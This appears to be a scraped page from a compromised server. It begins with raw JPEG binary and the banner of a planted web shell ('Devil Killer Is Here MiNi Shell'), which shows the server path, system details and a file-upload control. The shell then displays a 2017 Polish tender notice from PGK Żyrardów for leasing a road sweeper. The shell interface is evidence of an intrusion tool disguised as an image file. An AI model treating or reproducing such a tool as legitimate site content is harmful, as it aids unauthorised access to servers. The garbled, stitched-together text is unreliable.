JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170428/77068-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://' target='_blank'>http://</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 77068 - 2017
              z dnia 2017-04-28 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Żyrardów: Usługa leasingu samochodu specjalnego Samojezdna zamiatarka drogowa.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Przedsiębiorstwo Gospodarki Komunalnej "Zyrardów: Sp. z o.o., krajowy numer identyfikacyjny
              750086653, ul.
              Czysta  
              5,
              96-300 
              Żyrardów, woj.
              mazowieckie, państwo
              Polska, tel.
              +48(46)8554041, e-mail
              fibich@pgk.zyrardow.pl, faks
              +48(46)8553280.
              <br />
              Adres strony internetowej (URL): www.pgk.zyrardow.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Podmiot prawa publicznego
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.pgk.zyrardow.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Usługa leasingu samochodu specjalnego Samojezdna zamiatarka drogowa.<br /><b>Numer referencyjny: </b>ZP.TZ.13.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest usługa leasingu operacyjnego z oprocentowaniem zmiennym na sfinansowanie fabrycznie nowego samochodu z zabudową specjalistyczną Samojezdna zamiatarka drogowa. 
1.Szczegółowy opis przedmiotu zamówienia:
  
1.1 Specyfikacja podwozia:

Fabrycznie nowe rok produkcji: 2017
Kierownica regulowana w dwóch płaszczyznach.
Układ napędowy 4x2 z blokadą tylnego mostu
Rozstaw osi max. 3.360 mm
Dopuszczalna masa całkowita pojazdu (DMC): max. 18 Mg
Silnik spalinowy, spełniający normę EUR 6 o mocy minimum 170 kW i momencie obrotowym minimalnym 900 Nm z układem podgrzewania paliwa zapewniającym ciągłą pracę pojazdu również w niskich temperaturach 
Wydech spalin z tłumikiem stojącym za kabiną (wylot spalin do góry).
Tłumik ze stali szlachetnej z katalizatorem.
Kabina kierowcy krótka, dzienna, liczba miejsc 2, z tylną ścianą przeszkloną
Lampa ostrzegawcza z przodu pojazdu  listwowa na kabinie, z tyłu pojazdu  obrotowa.  
Dodatkowa lampa oświetlająca, ,,szperacz,  zamontowana za kabiną, włączana  z wnętrza kabiny kierowcy.  
Resory przednie paraboliczne.
Wzmocniona przednia część ramy pojazdu pod montaż zabudów specjalnych (montaż przedniej szczotki).
Filtr przeciwpyłkowy z węglem aktywnym.
Klimatyzacja fabryczna.
Radio CD z Blouetooth.
Zamontowana kamera/kamery cofania z monitorem kolorowym.
Lusterko szerokokątne po stronie kierowcy i pasażera elektrycznie regulowane.
Lusterko przednie zamontowane nad szybą przednią,  podgrzewane.
Elektrycznie sterowane szyby po stronie kierowcy i pasażera.
Osłona przeciwsłoneczna zewnętrzna, przezroczysta
Schowek dachowy 
Czołownica do mocowania szczotki przedniej z wyprowadzonym przyłączem wysokoprądowym 24 V
Fotel kierowcy amortyzowany, komfortowy, z pneumatyczną  regulacją.
Tapicerka welurowa z wymiennymi pokrowcami (2 komplety)
Dywaniki gumowe dla wszystkich miejsc w kabinie- zdejmowane
Główny zbiornik paliwa o pojemności min. 120 l, zamykany na kluczyk wyposażony w osłonę wlewu przed zabrudzeniami. 
Wzmocniona oś przednia o minimalnej nośności :  5.100 kg.
Wzmocniona oś tylna o minimalnej nośności :  10.500 kg. 
Ogumienie radialne o oznaczeniu 10 R 22,5.
Koła zapasowe:
1 szt. - koła prowadzące
1 szt.  koła napędowe
Obręcze stalowe jednoczęściowe 7.5 x 22.5 do bezdętkowych  opon radialnych.
Kluczyki do pojazdu z fabrycznym Immobilizerem -3 komplety.
Sygnał ostrzegawczy załączonego biegu wstecznego.
Tachograf cyfrowy z ważną kalibracją i legalizacją.
Hamulce tarczowe na osi przedniej i tylnej z systemem ABS i ASR 
i korektorem siły hamowania.
Zamontowany system jazdy ułatwiający utrzymanie pasa ruchu
Mechaniczna skrzynia biegów z biegiem bezpośrednim całkowicie zsynchronizowana, 8 biegami do jazdy w przód, biegiem pełzającym pozwalającym na jazdę z prędkością poniżej 3,5 km/h, oraz biegiem wstecznym.
Silnikowa przystawka odbioru mocy z przodu z pompą tandemową.
Wyjście napędu z tyłu silnika do zasilania pompy hydraulicznej.
Podwozie przystosowane do zabudowy typu zamiatarka drogowa.
System informujący  o  ewentualnych usterkach pojazdu 
Trójkąt ostrzegawczy, gaśnica, kamizelka, apteczka.
Lampa przenośna.
Podnośnik dostosowany do DMC pojazdu.
Podstawowy zestaw narzędzi m.in. do wymiany kół
Reflektory przeciwmgielne halogenowe
Kabina kierowcy wyposażona w instalację pozwalającą na montaż dodatkowych odbiorników elektrycznych (12 V i 24 V).
Sposób oznakowania nazwą  po uzgodnieniu z Zamawiającym 
Gwarancja: min. 36 miesięcy 

1.2Specyfikacja zabudowy zamiatarki:

Zbiornik na zmiotki ze stali szlachetnej (1.4301) o grubości min. 3 mm z hydraulicznym podnoszeniem oraz dodatkową ręczną pompą do awaryjnego unoszenia zbiornika.
Podłoga zbiornika ze stali szlachetnej (1.4301) o grubości min. 4 mm
Podnoszenie zbiornika na zmiotki oraz obsługa drzwi wyładowczych  hydrauliczne  za pomocą pulpitu sterowania w kabinie z opcją sterowania z zewnątrz pojazdu.
Zabezpieczenie przed niespodziewanym opuszczeniem zbiornika. 
Wysyp śmieci do tyłu przez hydrauliczne uniesienie pojemnika pod kątem min. 600
Kontrolka oraz sygnał dźwiękowy informujący o podniesionym pojemniku na zmiotki 
Kurtyna z łańcuchów w zbiorniku na zmiotki.
Sito w zbiorniku na zmiotki wykonane ze stali szlachetnej (1.4301)
Pojemność zbiornika zmiotek brutto min. 7 m3 
Pojemność zbiornika  zmiotek netto, wg. EN 15429, min. 5,8  m3
Drzwiczki w zbiorniku zmiotek do wrzucania większych przedmiotów.
Króciec z wężem do spuszczania nadmiaru zebranej wody na drzwiach zbiornika zmiotek.
Napęd zamiatarki poprzez własny silnik napędowy, wysokoprężny, o mocy min. 55 kW chłodzony cieczą   
Turbina ssawna o natężeniu przepływu powietrza min. 18.000 m3/h wytwarzająca podciśnienie min. 1.030 mmH2O.
Materiał koła turbiny : stal Hardox
Zakres obrotów przy których turbina osiąga pełną wydajność 2.100 - 3.100
Dwa agregaty zamiatające: z lewej i prawej strony, z systemem zraszania z możliwością pracy jednocześnie dwoma agregatami .
Agregat zamiatający posiadający odchylaną, ciągnioną szczotkę talerzową o średnicy min. 750 mm, wózek zasysający na 2 kołach tocznych (pełne opony gumowe), posiadający dyszę ssącą, z klapką sterowaną pneumatycznie do wciągania większych przedmiotów. 
Połączenia gwintowane w  agregatach zamiatających ze stali
Szczotki talerzowe i nagarniająca mieszane: tworzywo sztuczne/stal
Dysze ssące pokryte wewnątrz materiałem elastycznym
Szerokość ssawy min. 700 mm z przewodem zasysającym o średnicy min. 250 mm
Za dyszami ssącymi poprzeczne szczotki walcowe domiatające z tworzywa sztucznego średnicy min. 300 mm i min. 650 mm długości napędzane hydraulicznie i uruchamiane jednocześnie z agregatem 
Automatyczne unoszeniem całego wózka po włączeniu biegu wstecznego.
Nagarniająca, centralna, szczotka walcowa o średnicy min. 400 mm i długości min. 1.300 mm z systemem zraszania zawieszona wahliwie, ustawiająca się automatycznie przy wyborze pracy lewym lub prawym agregatem.
Fartuch z przy szczotce walcowej z regulowaną klapą, w zależności od rodzaju nieczystości na drodze.
Pneumatyczny kład sterowania zapewniający:
zmianę docisku lub odciążenia szczotek talerzowych
zmianę docisku lub odciążenia szczotki walcowej
Cyfrowy wyświetlacz w kabinie pokazujący co najmniej:
liczbę godzin pracy
liczbę godzin czasu od uruchomienia
kilometry zamiatania
przejechany dystans
Układ sterowania z kabiny kierowcy pozwalający na:
hydrauliczne sterowanie kątem pochylenia bocznych szczotek w kierunku wzdłużnym i poprzecznym
dodatkowe, hydrauliczne, wysunięcie lewego i prawego agregatu o 150 mm z każdej strony
bezstopniową regulację obrotów szczotek talerzowych i walcowej w pełnym zakresie 
Dotykowy ekran centralnego pulpitu sterującego z automatyczną regulacją jasności za pomocy sensora natężenia światła otoczenia.
Pulpit sterujący obsługujący pokładowy system diagnostyczny zamiatarki
Zabezpieczenie silnika hydraulicznego szczotki walcowej w przypadku najechania na przeszkodę.
Układ sterujący, z pulpitu w kabinie, dodatkowym wysunięciem  agregatu zamiatającego z prawej i lewej strony o 150 mm.
Reflektory LED, po 2 szt. do każdego agregatu oświetlające strefę roboczą.
Szerokość zamiatania ścieku przykrawężnikowego (szczotka talerzowa + ssawa): min. 1.200 mm 
Szerokość zamiatania jednym agregatem (szczotka talerzowa + ssawa + szczotka walcowa): min. 2.350 mm, z wysunięciem bocznym min.: 2.500 mm
Całkowita szerokość zamiatania dwoma agregatami jednocześnie 
min.: 3.450 mm, przy czym powierzchnia na całej szerokości musi być operowana szczotkami z zachodzeniem na siebie śladów zamiatania 
Całkowita szerokość zamiatania dwoma agregatami jednocześnie z bocznym wysunięciem agregatu z lewej i prawej strony o dodatkowe 
150 mm z każdej strony: min. 3.750 mm, przy czym powierzchnia na całej szerokości musi być operowana szczotkami 
Zbiornik/zbiorniki wody o pojemności łącznej min. 1.600 l, ze stali szlachetnej (1.4301,) z przyłączem do wody o średnicy 52 mm, wskaźnikiem poziomu wody rurkowym oraz elektronicznym (na wyświetlaczu panelu sterującego) 
Zawór umożliwiający wlewanie do zbiorników/zbiornika preparatów zmywających
Układ wodny wyposażony w filtr.
Instalacja czyszcząca z zaworem i eurozłączem typu D oraz wężem o długości min. 10 m z końcówką do mycia zamiatarki (np. zbiornika na śmieci, krawędzi zamknięcia drzwi zbiornika, zespołu zamiatającego)
Układ zraszania obszaru zamiatania z hydraulicznie napędzaną pompą membranową (niewrażliwą na pracę na sucho).
Pompa wodna o wydatku min. 48 l/min i ciśnieniu min. 8 bar
Pneumatyczne urządzenie do opróżniania instalacji z wody w przypadku zagrożenia mrozem.
Instalacja do zmywania ulic montowana z przodu pojazdu posiadająca min. 8 dysz ceramicznych lub ze stali szlachetnej umożliwiająca zmywanie pasa drogi o szerokości min. 3,0 metry.  
Sterowanie dyszami wodnymi z pulpitu sterującego zamiatarki.
Dysze (ceramiczne lub ze stali szlachetnej) wodne przy szczotkach talerzowych wyposażone dodatkowo w manualnie regulowane zawory
Linka stalowa do udrażniania sit zamontowana na zewnątrz zabudowy 
Poziom hałasu na zewnątrz nie więcej niż: LWA 108 dB(A).
Certyfikat potwierdzający spełnianie normy EN 15429-3 w zakresie usuwania i przechwytywania cząstek stałych PM 10 i PM 2,5 
Deklaracja CE zgodności z dyrektywami 2006/42/EG; 2000/14/EG CE
Schowki narzędziowe z lewej i prawej strony zintegrowane ze zbiornikiem zmiotek
Drabina i skrobak do mechanicznego czyszczenia zbiornika zmiotek
Klapa gumowa do kierowania strumienia powietrza
Wylot powietrza do tyłu pod zbiornikiem
Kamera do obserwacji z tyłu zamiatarki z 2-ma kamerami bocznymi do obserwacji pracy bocznych agregatów z kolorowym monitorem w kabinie
Oznakowanie konturowe
Gwarancja: min. 24 miesiące.

1.3 Wymagania dodatkowe

Szkolenie pracowników Zamawiającego (eksploatacja, BHP) w dniu dostawy przedmiotu zamówienia, w siedzibie PGK Żyrardów Sp. z o.o.
Montaż, na płycie czołowej podwozia, dodatkowej, przedniej szczotki tarczowej (szczotka w posiadaniu Zamawiającego)
Wyposażenie w instalację umożliwiającą zamontowanie systemu monitorowania pojazdów  ELTE
Dostarczenie w dniu dostawy instrukcji obsługi oraz schematów instalacji: elektrycznej, pneumatycznej, hydraulicznej (w języku polskim).

1.4 Warunki leasingu:

Termin dostawy przedmiotu zamówienia  60 dni od podpisania umowy
Okres leasingu  48 miesięcy
Opłata wstępna  10 %
Opłata końcowa  6 %
Preferowany okres spłaty rat leasingowych  pięć ostatnich dni miesiąca
Nie przewiduje się wystąpienia innych dodatkowych kosztów
Możliwość wykupu przedmiotu leasingu z prawem do pierwokupu
Waluta leasingu  polski złoty
Raty leasingowe zmienne, uzależnione od stopy WIBOR 
Pozostałe warunki leasingu regulowane są przez wewnętrzny regulamin Leasingodawcy (o ile taki istnieje) oraz postanowienia Kodeksu Cywilnego
Koszty rejestracji i koszty podatku drogowego przedmiotu zamówienia ponosi Wykonawca. Są to koszty składnika ceny brutto.
Zamawiający zastrzega sobie prawo wyboru ubezpieczyciela ponieważ sam będzie ponosił koszty ubezpieczenia przedmiotu leasingu. 
2.   Zamawiający w niniejszym postępowaniu nie przewiduje wymagań, o których mowa w art. 29 ust. 3a i 4 ustawy Pzp.
3.  Zamawiający zgodnie z art. 144 ustawy Pzp przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
 zmiany będące następstwem działania organów administracji, przepisów prawa w szczególności: a) zmiana stawki podatku VAT.
Zamawiający unieważni postępowanie o udzielenie niniejszego zamówienia w przypadkach i na zasadach określonych w art. 93 ust. 1, 3, 4 i 5 ustawy Pzp.

 <br /><br /><b>II.5) Główny kod CPV: </b>66114000-2<br /><b> Dodatkowe kody CPV:</b>66000000-0,
                66510000-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 60<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Wymagany termin wykonania zamówienia: 60 dni od dnia podpisania Umowy. Wydanie przedmiotu leasingu 60 dni od dnia podpisania Umowy.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa niniejszego warunku udziału w postępowaniu.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca musi spełniać warunek posiadania środków finansowych lub zdolności kredytowej w wysokości co najmniej 2 000 000,00 zł (słownie: dwa miliony złotych). 
W celu potwierdzenia spełniania warunku, o którym mowa w pkt. VI.1.2)b), Wykonawca (ten z Wykonawców składających ofertę wspólną, który będzie potwierdzał spełnianie tego warunku), zobowiązany jest przedłożyć informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 1 miesiąc przed upływem terminu składania ofert.
Posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej 
z przedmiotem zamówienia w wysokości co najmniej 1 500 000,00 zł.
W celu potwierdzenia spełniania warunku, o którym mowa powyżej Wykonawca (ten z Wykonawców składających ofertę wspólną, który będzie potwierdzał spełnianie tego warunku), zobowiązany jest przedłożyć dokument, potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wymaganej kwocie.

Jeżeli, z uzasadnionej przyczyny Wykonawca nie może złożyć dokumentów dotyczących sytuacji finansowej lub ekonomicznej wymaganych przez Zamawiającego, może złożyć inny dokument, który w wystarczający sposób potwierdza spełnianie opisanych wyżej przez Zamawiającego warunków.

Jeżeli kwoty w dokumentach wymienionych wyżej podane będą w innej walucie niż zł, Zamawiający dokona jej przeliczenia na zł według kursu NBP na dzień, w którym zostało wszczęte postępowanie.

Jeżeli w dniu wszczęcia postępowania nie zostanie opublikowana tabela średnich kursów NBP, zastosowany zostanie kurs z ostatniej tabeli kursów średnich opublikowanej przed dniem wszczęcia postępowania.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek określony w pkt.VI.1.2)b) mogą oni spełniać łącznie.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                W szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będą łącznie ich zdolności techniczne lub zawodowe): 
Wykonawca w celu potwierdzenia posiadania wiedzy i doświadczenia musi wykazać, że należycie wykonał, z zastrzeżeniem art. 26 ust. 2 b ustawy Prawo zamówień publicznych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie minimum 4 usług leasingu samochodu specjalnego o wartości nie mniejszej niż 500 000,00 zł brutto każda.

W celu potwierdzenia spełniania niniejszego warunku, Wykonawcy zobowiązani są przedłożyć:
a)wykaz minimum 4 usług leasingu samochodu specjalnego z zabudową na podwoziu samochodu ciężarowego o wartości nie mniejszej niż 500 000,00 zł brutto.-  wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  z tego okresu, przygotowane wg wzoru - załącznika nr 2 do SIWZ, 
b)dowodów potwierdzających, że usługi wskazane w wykazie zostały wykonane należycie (np.: referencje, protokoły odbioru).

Dowodami potwierdzającym czy usługi zostały wykonane lub są wykonywane należycie są także:
- poświadczenie lub inny dokument potwierdzający należyte wykonanie usługi,
- oświadczenie wykonawcy  jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej. Jeżeli Wykonawca składa oświadczenie, zobowiązany jest podać przyczyny braku możliwości uzyskania poświadczenia.

W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wykazane w wykazie zostały wcześniej wykonane Wykonawca nie ma obowiązku przedkładania dowodów potwierdzających czy usługi te zostały wykonane należycie.
